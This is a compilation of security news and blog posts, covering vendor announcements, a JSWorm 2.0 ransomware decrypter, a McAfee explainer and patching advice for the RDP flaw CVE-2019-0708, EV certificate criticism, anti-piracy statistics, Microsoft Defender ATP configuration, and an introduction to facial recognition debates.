Aqua Security validates its Cloud Native Security Platform for VMware Enterprise PKS

Aqua Security, the leading platform provider for securing container-based and cloud native applications, announced that Aqua Cloud Native Security Platform (CSP) has attained VMware Partner Ready status for PKS. The validation of Aqua’s CSP validates that the solution has been tested and verified to interoperate with VMware Enterprise PKS, and can fully manage and secure workloads running on VMware Enterprise PKS. “We are pleased that Aqua Security has validated its Cloud Native Security Platform for … More

The post Aqua Security validates its Cloud Native Security Platform for VMware Enterprise PKS appeared first on Help Net Security.

riskmethods and RapidRatings partnership to enhance customers’ risk management practices

riskmethods, a leader in supply chain risk management, has partnered with RapidRatings to allow their customers to incorporate financial health data of public and private partners into their supply chain risk management workflows. With the riskmethods and RapidRatings combined solution, companies can streamline traditional data entry and data extraction processes and automatically integrate their financial data sources, including financial risk indicators derived by RapidRatings, into the riskmethods scorecard. Customers can now receive the best financial … More

The post riskmethods and RapidRatings partnership to enhance customers’ risk management practices appeared first on Help Net Security.

Radiant Logic unveils RadiantOne with FIPS 140-2 validated encryption

Radiant Logic, the leading provider of the federated identity and directory service, announced the immediate availability of RadiantOne with FIPS 140-2 validated encryption. Radiant Logic recently achieved the FIPS 140-2 validation after an independently accredited lab put the Radiant Logic Cryptographic Module for Java through a series of tests. After proving conformance with the FIPS 140-2 standard, the module’s test report was sent to CMVP, the Cryptographic Module Validation Program, operated by the United States … More

The post Radiant Logic unveils RadiantOne with FIPS 140-2 validated encryption appeared first on Help Net Security.

GlobalSign Digital Signing Service now supports 2014/55/EU directive

GMO GlobalSign, a global Certificate Authority (CA) and leading provider of identity and security solutions for the Internet of Things (IoT), announced that its popular Digital Signing Service (DSS) supports 2014/55/EU, the newly implemented European Union directive regarding electronic invoicing. The directive defines a common standard for e-invoices to reduce the complexity and legal uncertainty around e-invoicing and make cross-border trade relations easier. As a result of the new regulation, which came into force on … More

The post GlobalSign Digital Signing Service now supports 2014/55/EU directive appeared first on Help Net Security.

Spirent incorporates NetSecOPEN test suite into its CyberFlood testing platform

Spirent Communications, the trusted provider of test, measurement, assurance, and analytics solutions for next-generation devices and networks, announced that it has fully incorporated the NetSecOPEN test suite into its CyberFlood testing platform. The new built-in capabilities provide CyberFlood users with the ability to easily perform assessments of their security systems using the full breadth of NetSecOPEN’s open network security test standard methodologies. NetSecOPEN is a vendor-independent standards body that brings together leading testing solutions vendors, … More

The post Spirent incorporates NetSecOPEN test suite into its CyberFlood testing platform appeared first on Help Net Security.

Pliant raises over $2.5 million to launch the RPA company

Pliant, a workflow automation platform for API-driven enterprise and service provider infrastructures, announced it has launched out of stealth and secured over $2.5 million in funding, led by former SevOne tech startup exec, Vess Bakalov. Backed by Newfund Capital, New Stack Ventures, Leading Edge, and other angel and family investors, the funding will be used to launch the RPA company. “In today’s on-demand and fast-paced economy, Pliant lets you build sophisticated workflows to automate complex … More

The post Pliant raises over $2.5 million to launch the RPA company appeared first on Help Net Security.

Emsisoft released a free Decrypter for JSWorm 2.0

Good news for the victims of the JSWorm 2.0 ransomware, thanks to experts at Emsisoft they can decrypt their file for free.

Experts at Emsisoft malware research team released a decrypter for a recently discovered ransomware tracked as JSWorm 2.0.

JSWorm 2.0 is written in C++ and implements Blowfish encryption. The first version of the malware was written in C# and used the “.JSWORM” extension. Researchers believe both versions were developed by the same author.

Researchers found notable callouts in two different malware samples naming ID Ransomware and several prominent malware researchers:




Experts pointed out that there have been multiple confirmed submissions to the online service ID Ransomware that allows victims to upload their encrypted files to identify the ransomware that infected their machines. Since January 2019, experts observed encrypted files uploaded from South Africa, Italy, France, Iran, Vietnam, Argentina, United States, and other countries.

“Its files have the “.[ID-<numbers>][<email>].JSWORM” extension and the ransom note file named “JSWORM-DECRYPT.txt.”” reads the post published by Emsisoft.

Once infected a computer, the JSWorm 2.0 ransomware will perform the following actions:

  • Sets the “EnableLinkedConnections” registry key, which allows it to attack mapped drives when ran as admin.
  • Restarts SMB services (lanmanworkstation) to take effect (we are investigating if there’s more to the SMB vector).
  • Stops services for databases (MSSQL, MySQL, QuickBooks), kills shadow copies, disables recovery mode.

Victims of the JSWorm ransomware have to follow the instructions below to decrypt their files for free:

  1. Download the Emsisoft JSWorm 2.0 Decrypter.
  2. Run the executable and confirm the license agreement when asked.
  3. Click “Browse” and select the ransom note file on your computer.
  4. Click “Start” to decrypt your files. Note that this may take a while.
JSWorm decrypter


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – JSWorm 2.0. ransomware)

The post Emsisoft released a free Decrypter for JSWorm 2.0 appeared first on Security Affairs.

RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP, which has not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

According to the advisory, the issue discovered was serious enough that it led to Remote Code Execution and was wormable, meaning it could spread automatically on unprotected systems. The bulletin referenced well-known network worm “WannaCry” which was heavily exploited just a couple of months after Microsoft released MS17-010 as a patch for the related vulnerability in March 2017. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario and we are urging those with unpatched and affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely malicious actors have weaponized this bug and exploitation attempts will likely be observed in the wild in the very near future.

Vulnerable Operating Systems:

  • Windows 2003
  • Windows XP
  • Windows 7
  • Windows Server 2008
  • Windows Server 2008 R2

Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

The Remote Desktop Protocol (RDP) enables connection between a client and endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1, but due to limitations on the number of channels further defined Dynamic Virtual Channels (DVCs), which are contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs which are created and torn down on demand.

It’s this 32 SVC binding which CVE-2019-0708 patch fixes within the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions in the RDP driver termdd.sys. As can been seen in figure 1, the RDP Connection Sequence connections are initiated and channels setup prior to Security Commencement, which enables CVE-2019-0708 to be wormable since it can self-propagate over the network once it discovers open port 3389.


Figure 1: RDP Protocol Sequence

The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

Figure 2: Standard GCC Conference Initialization Sequence

However, during GCC Conference Initialization, the Client supplies the channel name which is not whitelisted by the server, meaning an attacker can setup another SVC named “MS_T120” on a channel other than 31. It’s the use of MS_T120 in a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).

Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence with “MS_T120” channel on channel number 4.

Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel

The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

Figure 4: Windows Kernel and User Components

The Microsoft patch as shown in figure 5 now adds a check for a client connection request using channel name “MS_T120” and ensures it binds to channel 31 only (1Fh) in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.

Figure 5: Microsoft Patch Adding Channel Binding Check

After we investigated the patch being applied for both Windows 2003 and XP and understood how the RDP protocol was parsed before and after patch, we decided to test and create a Proof-of-Concept (PoC) that would use the vulnerability and remotely execute code on a victim’s machine to launch the calculator application, a well-known litmus test for remote code execution.

Figure 6: Screenshot of our PoC executing

For our setup, RDP was running on the machine and we confirmed we had the unpatched versions running on the test setup. The result of our exploit can be viewed in the following video:

There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit is working and that it is possible to remotely execute code on a vulnerable system without authentication. Network Level Authentication should be effective to stop this exploit if enabled; however, if an attacker has credentials, they will bypass this step.

As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.


  • We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.
  • Disable RDP from outside of your network and limit it internally; disable entirely if not needed. The exploit is not successful when RDP is disabled.
  • Client requests with “MS_T120” on any channel other than 31 during GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence for legitimate use case.


It is important to note as well that the RDP default port can be changed in a registry field, and after a reboot will be tied the newly specified port. From a detection standpoint this is highly relevant.

Figure 7: RDP default port can be modified in the registry

Malware or administrators inside of a corporation can change this with admin rights (or with a program that bypasses UAC) and write this new port in the registry; if the system is not patched the vulnerability will still be exploitable over the unique port.

McAfee Customers:

Please stay tuned for product bulletins and security updates shortly!

If you have any questions, please contact McAfee Technical Support.


The post RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708 appeared first on McAfee Blogs.

PayPal’s Beautiful Demonstration of Extended Validation FUD

PayPal's Beautiful Demonstration of Extended Validation FUD

Sometimes the discussion around extended validation certificates (EV) feels a little like flogging a dead horse. In fact, it was only September that I proposed EV certificates are already dead for all sorts of good reasons that have only been reinforced since that time. Yet somehow, the discussion does seem to come up time and again as it did following this recent tweet of mine:

Frankly, I think this is more a symptom of people coming to grips with the true meaning of SSL (or TLS) than it is anything changing with the way certs are actually issued, but I digress. The ensuing discussion after that tweet reminded me that I really must check back in on what I suspect may be the single most significant example of why EV has become little more than a useless gimmick today. It all started on stage at NDC Sydney in September, more than 8 months ago now. Here's the exact moment deep-linked in the recorded video:

Well that was unexpected. I came off stage afterwards and sat down with Scott Helme to delve into it further, whereupon we found behaviour that you can still see today at the time of writing. Here's PayPal in Firefox:

PayPal's Beautiful Demonstration of Extended Validation FUD

You can clearly see the green EV indicator next to the address bar in Firefox, but load it up in Chrome and, well...

PayPal's Beautiful Demonstration of Extended Validation FUD

Now, you may have actually spotted in the video that the cert was issued by "DigiCert SHA2 Extended Validation Server CA" which would imply EV. It also the same cert being issued to both Firefox and Chrome too, here's a look at it in both browsers (note that the serial number and validity periods match up):

PayPal's Beautiful Demonstration of Extended Validation FUD
PayPal's Beautiful Demonstration of Extended Validation FUD

The reason we're seeing the EV indicator in Firefox and not in Chrome has to do with the way the certificates chain in the respective browsers and again, here's Firefox then Chrome:

PayPal's Beautiful Demonstration of Extended Validation FUD
PayPal's Beautiful Demonstration of Extended Validation FUD

Whilst "DigiCert SHA2 Extended Validation Server CA" is the same in each browser, the upstream chain is then different with Firefox and Chrome both seeing different "DigiCert High Assurance EV Root CA" certs (even though they're named the same) and Chrome obviously then chaining up another couple of hops from there. But frankly, the technical explanation really isn't the point here, the point is that we're now nearly 8 months in which can only mean this:

PayPal really doesn't care that the world's most popular browser no longer displays the EV visual indicator.

And that's all EV ever really had going for it! (Note: yes, I know there can be regulatory requirements for EV in some jurisdictions, but let's not confuse that with it actaully doing anything useful.) The entire value proposition put forward by the commercial CAs selling EV is that people will look for the indicator and trust the site so... it's pretty obvious that's not happening with PayPal.

Furthermore, as I've said many times before, for EV to work people have to change their behaviour when they don't see it! If someone stands up a PayPal phishing site, for example, EV is relying on people to say "ah, I was going to enter my PayPal credentials but I don't see EV therefore I won't". That's how EV "stops phishing" (according to those selling the certs), yet here we are with a site that used to have EV and if it ever worked then it was only by people knowing that PayPal should have it. So what does it signal now that it's no longer there? Clearly, that people aren't turning away due to it's absence.

And finally, do you reckon PayPal is the sort of organisation that has the resources to go out and get another EV cert that would restore the visual indicator if need be? Of course they are! Have they? No, because it would be pointless anyway because nobody actually changes their behaviour in its absence!

It's a dead duck, let's move on.

Data Security in the Cloud: How to Lock Down the Next-Gen Perimeter

Enjoy the video replay of the recent Threatpost cloud security webinar, featuring a panel of experts offering best practices and ideas for managing data in a cloudified world.

Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones

Since April 2019, Group-IB has successfully blocked more than 43,000 links to pirated copies of the Game of Thrones Season 8 on pirate websites, forums, and social media

As the Game of Thrones saga came to a close (no spoilers here), Group-IB has summed up the results of its anti-piracy campaign during Season 8 of the Game of Thrones – one of the biggest franchises in the TV history. Since April 2019, when the final season premiered, Group-IB Anti-Piracy team has successfully blocked more than 43,000 links to pirated copies of the GOT Season 8 on pirate websites, forums, and social media. Group-IB’s Anti-Piracy team was brought in to protect Game of Thrones against online pirates back in 2015. Since that time, the company’s specialists have blocked more than 180,000 links to illegal copies of Game of Thrones in Russian.

The final GOT Season 8 premiered on 14 April and became one of the show’s most popular seasons not only among fans all over the world, but also among online pirates. Group-IB’s Anti-Piracy team discovered and blocked 43,711 links to pirated Season 8 episodes in Russian. Illegal copies surfaced on pirate websites, forums, and social media. Pirated copies of the GOT Season 8 episodes were spotted on 1,098 different websites, 94 of which were designed exclusively for the distribution of pirated GOT copies.

More than 30,000 unique links to pirated GOT episodes have been removed from the search results of the Russian search engine Yandex. In response to the blocking, online pirates struck back by creating mirrors on a daily basis – copies of their websites with new but very similar domain names. For instance, one of the pirates created more than 20 mirrors on their subdomains. However, according to the pirates’ forum posts, the owners of pirate websites were not ready for the “attack” on them: “Looks like somebody just wiped the links out. Some of the pages disappeared… some of them do not appear in search results”. It is also interesting that some of the groups on, a Russian social network, removed pirated episodes after receiving complaints and turned into GOT fan pages.

The streaming service Amediateka holds exclusive distribution rights for the Game of Thrones in Russia and since April 2015, when Season 5 premiered, has used the services of Group-IB to fight online pirates distributing illegal copies of the GOT in Russian. Season after season, online pirates’ interest in the show has only been increasing. For example, while Season 5 was broadcast, Group-IB’s Anti-Piracy team detected and removed 2,067 links to illegal copies. Season 7 saw an increase, reaching 12,540 links to pirated episodes detected and blocked. Season 8 set a record of 43,711 links. For the past 4 years, Group-IB detected and blocked more than 180,000 links, including links detected and blocked between the seasons’ airings.

Game of Thrones Season 8

GOT is not the only Amediateka’s show that Group-IB’s Anti-Piracy team protects, but it turned out to be pirates’ favorite one. Pirates’ other top targets include True Detective, with 23,473 pirated links detected and blocked, Billions (20,303 links), The Good Wife (14,541 links), and Westworld, with  12,229 links detected and blocked by Group-IB Anti-Piracy team.

“For us the battle against online pirates, trying to profit off the illegal distribution of the Game of Thrones in Russian, was as fierce as for George R.R. Martin’s characters,” commented Andrey Busargin, Director of Anti-Piracy and Brand Protection at Group-IB. “I would also like to highlight Amediateka’s commitment to counter online piracy in Russia: they brought in Group-IB Anti-Piracy team ahead of time and have been making continuous efforts to popularize legal viewership of the Game of Thrones making it available on its website, in movie theaters all over the country and even on the stadium.”

Group-IB‘s fight against digital piracy started in 2011, when the Anti-Piracy Department was established. Group-IB’s Anti-Piracy team uses unique machine-learning technologies applied in complex investigations of cyberattacks to detect pirate websites, find their owners and block illegal content. Group-IB’s Anti-Piracy system monitors 100,000+ resources in all languages ranging from torrent trackers and streaming services to social media groups and pirate platforms in the DarkNet. The average time to detect the first pirated copy on the Internet is 30 minutes. 80% of pirated links are successfully blocked by Group-IB team within 24 hours of their appearance on the Internet.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

Pierluigi Paganini

(SecurityAffairs – piracy, Game of Thrones)

The post Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones appeared first on Security Affairs.

ITIL Service Operation Processes: A Brief Introduction

The ITIL Service Operation (SO), which is one of the five core publications that form part of the ITIL Service Management Lifecycle under ITIL (Information Technology Infrastructure Library) Framework, provides guidance regarding maintaining stability in IT Services and helps manage services in supported environments.

The ITIL SO module takes care of some very important responsibilities including the monitoring of services, the resolving of incidents, the fulfilling of requests and the execution of operational tasks. Once the formal handover from the Service Transition process module is done, the SO module takes control of new/changed services and takes care of the execution of all design and transition plans. The SO module also measures all these plans for actual efficiency.

The Objectives

The ITIL SO module, which is totally customer facing, ensures that IT services are delivered efficiently and effectively and also that quality of service is maintained. Hence, key functionalities like fixing problems and service failures, fulfilling of user requests, executing routine operation tasks etc come under the purview of the SO module. The SO module also takes care of some other important aspects including reducing incidents and problems, minimizing impact of service outages on businesses, ensuring authorized access only to agreed IT services, assisting organizations in delivering benefits within SLA in the best of manners, supporting users in service-related matters etc.

The Processes

There are five processes that come under ITIL SO. They are- Event Management, Incident Management, Request Fulfilment, Problem Management and Access Management.

While Event Management is basically about ensuring constant monitoring of CIs and services, Incident Management, as the term suggests, ensures that IT services are restored to working state quickly after unexpected incidents. Request Fulfilment is all about the acknowledging and processing of service requests from users and Problem Management helps find root cause of problems and seeking to mitigate impacts of problems or trying to prevent them from happening. The last, Access Management is all about ensuring authorized access to services and functions in accordance with pre-defined policies.

These five processes are assigned to two major functional groups- the Service Desk and the Technical Support Group (Technical, Application and IT Operations Management), about which we discuss in detail in the next section.

The Functions

ITIL SO comprises four functions and two sub-functions. The functions are- Service Desk, Technical Management, IT Operations Management and Applications Management.

Service Desk, which is the first and single point of contact, takes care of things like coordinating between end user and service provider, managing logged tickets, ensuring timely closure of user requests etc.

Technical Management is all about managing the IT infrastructure by providing technical expertise and support.

The IT Operations management deals with IT related day-to-day operational activities and comprises two sub-functions, namely IT Operations Control (monitoring and controlling of IT services and the underlying infrastructure) and Facilities Management (management of the physical environment where the IT infrastructure is located).

Application Management, as the term suggests, is all about managing applications throughout their lifecycle.

The Benefits

There are many benefits of the ITIL Service Operations process.

The main benefit, however, is that it helps reduce unplanned expenditure for organizations through optimized handling of service outages and proper identification of their causes. By ensuring that the duration and frequency of service outages are minimized, ITIL SO helps organizations make full use of services.

ITIL SO processes support an organizations security policy by ensuring proper access management and also helps obtain operational data to be used by other ITIL processes. Providing quick, effective access to standard IT services also is one of the benefits. It also helps provide a framework for automating iterative operations, thereby helping increase efficiency and better utilization of human resources.

The post ITIL Service Operation Processes: A Brief Introduction appeared first on .

Data Leak Exposes Instagram Influencers

A leaked database has compromised the personal information of more than 49 million Instagram users, including celebrities and “influencers.”

The information was found on an unsecured database hosted on an Amazon cloud server and includes public-facing information from Instagram accounts as well as personal details, including email addresses and phone numbers. Techcrunch, the website that initially broke the story, traced the database back to Chtrbox, a social media marketing firm based in Mumbai.

The database appears to have been initially compiled to determine relative costs and overall influence of each Instagram account.

The chief executive of Chtrbox declined to comment on the story.

See the initial Techcrunch news article here.


The post Data Leak Exposes Instagram Influencers appeared first on Adam Levin.

DHS Issues Alert on Chinese-Made Drones

DHS Issues Alert on Chinese-Made Drones

Chinese-made drones may be sending sensitive flight data to their manufacturers in China, according an alert issued by the US Department of Homeland Security (DHS), CNN reported on May 20.

In a copy of the alert obtained by CNN, DHS said, "The United States government has strong concerns about any technology product that takes American data into the territory of an authoritarian state that permits its intelligence services to have unfettered access to that data or otherwise abuses that access.”

While the report refrains from naming specific manufacturers, approximately 80% of the drones used in the US and Canada reportedly come from DJI in Shenzhen, China. DHS reportedly is concerned about "potential risk to an organization's information…[from products that] contain components that can compromise your data and share your information on a server accessed beyond the company itself," according to CNN.

"Those concerns apply with equal force to certain Chinese-made (unmanned aircraft systems)-connected devices capable of collecting and transferring potentially revealing data about their operations and the individuals and entities operating them, as China imposes unusually stringent obligations on its citizens to support national intelligence activities," the alert reportedly added.

“The Department of Commerce required Google to pull rights to use Google Play and apps on Android from Huawei. Now, we are hearing about risks of Chinese-made drones, which the primary manufacturer is DJI based in China,” said Chris Morales, head of security analytics at Vectra.

“The overall theme is that a third-party manufacturer could be using personal data for malicious intent. This is a theme that should expand beyond just a specific nation state actor. This is a real concern for any device that is collecting data on a user, regardless of where they are based.

“It doesn’t mean everyone is bad, though. Most organizations are in the business of making money and are not intentionally causing harm to consumers. Personally, I don’t even like enabling features, such as location services, on my personal device that gives even American companies too much data about me and my own personal habits.”

Step 9. Protect your OS: top 10 actions to secure your environment

In “Step 9. Protect your OS” of the Top 10 actions to secure your environment blog series, we provide resources to help you configure Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) to defend your Windows, macOS, Linux, iOS, and Android devices from advanced threats.

In an advanced threat, hackers and cybercriminals infiltrate your network through compromised users or vulnerable endpoints and can stay undetected for weeks—or even months—while they attempt to exfiltrate data and move laterally to gain more privileges. Microsoft Defender ATP helps you detect these threats early and take action immediately.

Enabling Microsoft Defender ATP and related products will help you:

  • Mitigate vulnerabilities.
  • Reduce your attack surface.
  • Enable next generation protection from the most advanced attacks.
  • Detect endpoint attacks in real-time and respond immediately.
  • Automate investigation and remediation.

Threat & Vulnerability Management

Threat & Vulnerability Management is a new component of Microsoft Defender ATP that provides:

  • Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities.
  • Linked machine vulnerability and security configuration assessment data in the context of exposure discovery.
  • Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager.

To use Threat & Vulnerability Management, you’ll need to turn on the Microsoft Defender ATP preview features.

Attack surface reduction

Attack surface reduction limits the number of attack vectors that a malicious actor can use to gain entry. You can configure attack surface reduction through the following:

  • Microsoft Intune
  • System Center Configuration Manager
  • Group Policy
  • PowerShell cmdlets

Enable these capabilities to reduce your attack surface:

Hardware-based isolation Configure Microsoft Defender Application Guard to protect your company while your employees browse the internet. You define which websites, cloud resources, and internal networks are trusted. Everything not on your list is considered untrusted.
Application control Restrict the applications that your users can run and require that applications earn trust in order to run.
Device control Configure Windows 10 hardware and software to “lock down” Windows systems so they operate with properties of mobile devices. Use configurable code to restrict devices to only run authorized apps.
Exploit protection Configure Microsoft Defender Exploit Guard to manage and reduce the attack surface of apps used by your employees.
Network protection Use network protection to prevent employees from using an application to access dangerous domains that may host phishing scams, exploits, and other malicious content.
Controlled folder access Prevent apps that Microsoft Defender Antivirus determines are malicious or suspicious from making changes to files in protected folder.
Network firewall Block unauthorized network traffic from flowing into or out of the local device.
Attack surface reduction controls Prevent actions and apps that are typically used by exploit-seeking malware to infect machines.

Next generation protection

The Intelligent Security Graph powers the antivirus capabilities of Microsoft Defender Antivirus, which works with Microsoft Defender ATP to protect desktops, laptops, and servers from the most advanced ransomware, fileless malware, and other types of attacks.

Configure Microsoft Defender Antivirus capabilities to:

Enable cloud-delivered protection Leverage artificial intelligence (AI) and machine learning algorithms to analyze the billions of signals on the Intelligent Security Graph and identify and block attacks within seconds.
Specify the cloud-delivered protection level Define the amount of information to be shared with the cloud and how aggressively new files are blocked.
Configure and validate network connections for Microsoft Defender Antivirus Configure firewall or network filtering rules to allow required URLs.
Configure the block at first sight feature Block new malware within seconds.

Endpoint detection and response

Microsoft Defender ATP endpoint detection and response capabilities detect advanced attacks in real-time and give you the power to respond immediately. Microsoft Defender ATP correlates alerts and aggregates them into an incident, so you can understand cross-entity attacks (Figure 1).

Alerts are grouped into an incident based on these criteria:

  • Automated investigation triggered the linked alert while investigating the original alert.
  • File characteristics associated with the alert are similar.
  • Manual association by a user to link the alerts.
  • Proximate time of alerts triggered on the same machine falls within a certain timeframe.
  • Same file is associated with different alerts.

Image of the Windows Defender Security Center.

Figure 1. Microsoft Defender ATP correlates alerts and aggregate them into incidents.

Review your alerts and incidents on the security operations dashboard. You can customize and filter the incident queue to help you focus on what matters most to your organization (Figure 2). You can also customize the alert queue view and the machine alerts view to make it easier for you to manage.

Image of a list of incidents in the Windows Defender Security Center.

Figure 2. Default incident queue displays incidents seen in the last 30 days, with the most recent incident showing at the top of the list.

Once you detect an attack that requires remediation, you can take the following actions:

Auto investigation and remediation

Microsoft Defender ATP can be configured to automatically investigate and remediate alerts (Figure 3), which will reduce the number of alerts your Security Operations team will need to investigate manually.

Image showing automated investigations in Microsoft Defender ATP.

Figure 3. You can view the details of an automated investigation to see information such as the investigation graph, alerts associated with the investigation, the machine that was investigated, and other information.

Create and manage machine groups in Microsoft Defender ATP to define automation levels:

Automation level Description
Not protected. Machines will not get any automated investigations run on them.
Semi – require approval for any remediation. This is the default automation level.
An approval is needed for any remediation action.
Semi – require approval for non-temp folders remediation. An approval is required on files or executables that are not in temporary folders. Files or executables in temporary folders, such as the user’s download folder or the user’s temp folder, will automatically be remediated if needed.
Semi – require approval for core folders remediation. An approval is required on files or executables that are in the operating system directories such as Windows folder and program files folder. Files or executables in all other folders will automatically be remediated if needed.
Full – remediate threats automatically. All remediation actions will be performed automatically.

Microsoft Threat Experts

Microsoft Threat Experts is a new, managed threat hunting service that provides proactive hunting, prioritization, and additional context and insights that further empower security operations centers (SOCs) to identify and respond to threats quickly and accurately with two capabilities:

  1. Targeted attack notifications—Alerts that are tailored to organizations provide as much information as can be quickly delivered to bring attention to critical network threats, including the timeline, scope of breach, and the methods of intrusion.
  2. Experts on demand—When a threat exceeds your SOC’s capability to investigate, or when more actionable information is needed, security experts provide technical consultation on relevant detections and adversaries. In cases where a full incident response becomes necessary, seamless transition to Microsoft incident response services is available.

Microsoft Defender ATP customers can register for Microsoft Threat Experts and we will reach out to notify you via email when you’ve been selected.

Learn more

Check back in a few weeks for our final blog post in the series, “Step 10. Detect and investigate security threats,” which will give you tips to deploy Azure Advanced Threat Protection to detect suspicious activity in real-time.


The post Step 9. Protect your OS: top 10 actions to secure your environment appeared first on Microsoft Security.

“Hackable?” Puts Smartphones to the Test

Is the Personal Data on Your Smartphone Vulnerable? Listen to Find Out: Used for everything from banking and taking pictures, to navigating, streaming, and connecting, mobile devices are a treasure trove of sensitive personal data. On the latest episode of “Hackable?” the team investigates how secure that data really is by inviting a white-hat to try and remotely penetrate our host Geoff’s smartphone. Listen now on Apple Podcasts and learn if one errant click could expose everything, including your deleted photos.  


The post “Hackable?” Puts Smartphones to the Test appeared first on McAfee Blogs.

“Hackable?” Puts Smartphones to the Test

Is the Personal Data on Your Smartphone Vulnerable? Listen to Find Out: Used for everything from banking and taking pictures, to navigating, streaming, and connecting, mobile devices are a treasure trove of sensitive personal data. On the latest episode of “Hackable?” the team investigates how secure that data really is by inviting a white-hat to try and remotely penetrate our host Geoff’s smartphone. Listen now on Apple Podcasts and learn if one errant click could expose everything, including your deleted photos.  


The post “Hackable?” Puts Smartphones to the Test appeared first on McAfee Blogs.

Facial Recognition Software 101: Current Debates and How to Elude It

Facial recognition software is a relatively new technological development that is becoming adopted on a large scale by law enforcement agencies and national intelligence agencies worldwide.

Theoretically, the adoption of facial recognition software and other biometric identification methods could help identify attacks before they occur and generally lead to a faster capture of criminals. Practically, many citizens and digital privacy advocates are fighting back against the use of facial recognition software.

So why is facial recognition software such a charged topic?

To help anyone understand exactly why people don’t like it, I’ll first dive into the current debates surrounding it and on the main controversies about facial recognition software. Then, I’ll continue by explaining how the technology works and how you can confuse it or resist it.

While I wouldn’t encourage anyone to do anything illegal or resist legitimate info requirements made by public authorities, the truth is that facial recognition software is still, in many ways, a wild west. The laws are being debated and subject to change.

Innovators and authorities are still exploring what the technology can do and discover new functionalities. Meanwhile, the public tries to catch up and debate whether the functionality should be used in the first place.

Therefore, attempts to resist facial recognition software and to confuse it are a vital part of current negotiations and debates, in a new landscape where the right to a private life can’t be taken for granted anymore.

But before we dive in deep into the intricacies of facial recognition software, we need to look a bit to the history of developing facial recognition software.

A short history of facial recognition software:

  • Mid-1960s: American mathematician Woodrow Wilson Bledsoe and his team develop a simple device which records facial features using a stylus and a tablet. His efforts helped pave the way towards modern facial recognition software and his intelligence team members are considered pioneers of AI and pattern recognition.
  • Between the 1980s and 1990s: MIT, Rhode Island, and Brown University scientists develop the technology further, leading to Eigenfaces. Eigenfaces are two-dimensional facial structures generated through algebraic formulae. They laid the foundation for contemporary facial recognition software.
  • After 2001: The 9/11 terrorist attacks highlighted the need to strengthen border security with better personal identification, via facial recognition software. This led to a wide-scale adaptation of this software, which continues to be improved to this day. Applications of the software were quickly picked up by the commercial sector as well (see below).
  • 2005: The first personal phone with facial recognition software is unveiled at the Security Show Japan. The technology was named OKAO Vision Face Recognition Sensor and it was developed by the OMRON Corporation.
  • 2005 – present: Facial recognition software is increasingly adopted by most smartphones but also perfected for the use of law enforcement and military groups. Machine learning and AI are employed for taking its accuracy to new heights and to vary its applications.

Why Is Facial Recognition Software So Debated Today?

As you can see, facial recognition software also has some consumer applications which are pretty popular (like the ones for smartphones).

Since security experts have long decried single-factor authentication (like security measures consisting only of passwords) as being too vulnerable to hacking (through credential stuffing attacks, for example), two-factor authentication is increasingly recommended and implemented. Some voices say even two-factor authentication is not as secure as previously thought.

In this context, methods of biometric authentication seem like a more secure way of accessing your accounts. Signing in with your face, your fingerprint, your iris scan or other bodily-related identity factors, which are (theoretically) accessible to no one buy you is the next level.

So why then are people against facial recognition software?

First and foremost, because facial recognition software started being employed in mass surveillance programs at nation-wide levels. People may not be against facial recognition software per se, but the way it started being used by law enforcement and state intelligence agencies are making most citizens uncomfortable.

Secondly, it’s not just the matter of privacy infringing: facial recognition software is also prone to errors and bias which cause people further discomfort.

Thirdly, as people become more educated in cybersecurity matters, with news of new data breaches making headlines every month, everyone is realizing that the safest bet is to have as little of your data collected as possible. If you allow devices to record even your most personal and private biometric data and store it for recognition and authentication, sooner or later the data might fall into the wrong hands.

Thor Foresight makes sure that link is safe!
Your parents and friends will click any suspicious link, so make sure they're protected.
Thor Foresight Home anti malware and ransomware protection heimdal security
Thor Foresight provides: Automatic and silent software updates Smart protection against malware Compatibility with any traditional antivirus.


Get Thor Foresight

